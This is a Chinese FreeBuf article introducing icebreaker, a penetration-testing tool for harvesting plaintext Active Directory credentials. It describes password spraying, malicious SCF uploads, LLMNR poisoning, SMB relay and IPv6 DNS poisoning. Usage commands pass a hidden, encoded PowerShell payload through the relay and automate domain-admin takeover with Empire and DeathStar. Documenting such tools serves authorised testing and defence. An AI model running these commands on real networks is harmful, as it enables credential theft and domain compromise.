freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

如何使用icebreaker在外部环境中获取活动目录明文凭证
2023-02-17 19:47:43
所属地 广西

关于icebreaker

icebreaker是一款针对活动目录凭证安全的研究工具,在该工具的帮助下,广大研究人员能够在活动目录环境之外(但在内部网络中)获取目标活动目录的明文凭证。

该工具会对目标活动目录以自动化的方式进行五次内部渗透测试,并尝试获取明文凭证。除此之外,我们还可以使用--auto选项来以自动化的形式获取域管理员权限。

工具运行机制

1、反向爆破:自动获取用户名列表,并使用两个最常用的活动目录密码测试每个用户名(两次以上的尝试可能会触发帐户锁定策略);

2、上传网络共享:通过将恶意文件上传到可用网络共享来捕获用户的密码;

3、渗透广播网络协议:使用常见的网络协议欺骗用户的计算机向我们发送密码;

4、中间人SMB连接:对活动目录计算机执行远程命令以收集密码;

5、渗透IPv6 DNS:利用DNS欺骗活动目录计算机将其用户密码发送给我们;

工具安装

广大研究人员可以使用下列命令将该项目源码克隆至本地:

git clone https://github.com/DanMcInerney/icebreaker.git

接下来,我们需要以root权限执行下列命令以安装icebreaker:

./setup.sh

pipenv install --three

pipenv shell

如果安装出问题的话,请将pipenv更新到最新版本:

apt-get remove python-pipenv && python setup.py install

Docker安装

我们还可以通过Docker来使用icebreaker,安装命令如下:

docker build --rm -t danmcinerney/icebreaker .

docker run danmcinery/icebreaker

工具使用

以root权限运行,并从一个IP地址列表(单个IP或CIDR范围)中读取目标:

./icebreaker -l targets.txt -c "powershell -nop -w hidden -exec bypass -enc WwFk..."

从主机列表中读取,告诉Responder使用eth0接口而不是默认网关接口,让Responder运行30m而不是通常的10m,并运行默认的ntlmrelayx命令以将SAM转储到目标服务器:

./icebreaker -l targets.txt -i eth0 -t 30 -c default

使用一个Nmap XML输出文件,跳过所有五次攻击,并为反向爆破使用自定义密码列表:

./icebreaker.py -x nmapscan.xml -s rid,scf,llmnr,relay,dns,crack -p /home/user/password-list.txt

用后即弃方法:

输入目标文件,抓取companydomain.com以获取要添加到反向爆破中的电子邮件用户名,跳过mitm6的IPv6 DNS投毒,并在攻击4开始后在tmux或xterm窗口中运行Empire和DeathStar以获得自动域管理:

./icebreaker.py -l targets.txt -d companydomain.com -s dns --auto [tmux/xterm]

许可证协议

本项目的开发与发布遵循MIT开源许可证协议。

项目地址

icebreaker:【GitHub传送门

参考资料

https://www.powershellempire.com/

https://byt3bl33d3r.github.io/automating-the-empire-with-the-death-star-getting-domain-admin-with-a-push-of-a-button.html

https://github.com/danielmiessler/SecLists/blob/601038eb4ea18c97177b43a757286d3c8a815db8/Passwords/merged.txt.tar.gz

# 活动目录 # 凭证转储 # AD安全 # 凭证安全
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录